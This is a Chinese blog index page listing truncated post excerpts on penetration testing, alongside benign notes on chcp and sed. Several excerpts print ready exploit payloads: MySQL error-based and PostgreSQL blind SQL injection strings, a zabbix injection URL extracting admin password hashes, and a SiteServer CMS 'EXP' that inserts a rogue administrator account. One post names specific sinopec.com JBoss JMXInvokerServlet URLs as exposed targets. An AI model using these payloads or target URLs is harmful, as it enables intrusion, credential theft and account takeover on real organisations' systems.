- 博客(11)
- 资源 (4)
- 收藏
- 关注
原创 一些python小脚本
暴力枚举猜解:http://www.wooyun.org/bugs/wooyun-2014-080211SQL poc :参考李姐姐http://www.wooyun.org/whitehats/lijiejie
2015-01-19 11:14:01 493
转载 mysql注入中三种报错模式利用方法详解
1、通过floor报错可以通过如下一些利用代码 代码如下复制代码and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);and (select count(
2015-01-17 01:25:02 815
原创 JBOSS的一些漏洞
http://olms.sinopec.com:80/invoker/JMXInvokerServlethttp://edcard.sinopec.com:80/invoker/JMXInvokerServlet还有一个就是未授权的访问
2015-01-12 23:52:22 1987
转载 cmd chcp命令切换字符格式
cmd chcp命令切换字符格式 命令介绍: chcp 65001 #换成utf-8代码页 chcp 936 #换成默认的gbk chcp 437 #美国英语 一般默认为gbk,若要修改成 utf-8,则需要: 1、cmd窗口输入: chcp 65001
2015-01-12 00:22:29 6422
转载 SiteServer CMS 0Day
经测试秒杀最新的3.5版 EXP:直接访问UserCenter/login.aspx用户名处输入:123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypte
2015-01-09 16:01:53 2765
原创 漏洞利用代码
zabbix注入 http://zabbix.server/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29
2015-01-09 12:50:13 650
原创 linux的sed命令使用
1. Sed简介 sed 是一种在线编辑器,它一次处理一行内容。处理时,把当前处理的行存储在临时缓冲区中,称为“模式空间”(pattern space),接着用sed命令处理缓冲区中的内容,处理完成后,把缓冲区的内容送往屏幕。接着处理下一行,这样不断重复,直到文件末尾。文件内容并没有 改变,除非你使用重定向存储输出。Sed主要用来自动编辑一个或多个文件;简化对文件的反复操作;编写转换程序等。
2015-01-09 11:53:37 385
原创 渗透测试相关
用谷歌插件进行路径扫描,看看常规的编辑器,敏感文件之类的扫描 御剑SQL注入检测:参考liejie的思路,常见的点在哪里XSS:这个目前还不太会利用吧
2015-01-06 21:32:28 891
原创 PostgreSql盲注相关代码
http://www.f4ck.org/article-2360-1.html 先猜当前数据库的长度and(selectlength(current_database())) between0 and30 其次ascii猜解库名的每个字符
2015-01-06 21:06:54 1482
原创 python检测SQL注入的相关代码(参考lijiejie)
mysql: post注入相关http://www.wooyun.org/bugs/wooyun-2010-082219 mssql: http://www.wooyun.org/bugs/wooyun-2010-081815oracle: http://www.wooyun.org/bugs/wooyun-2010-082564关于不同的
2015-01-04 23:19:56 2265
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人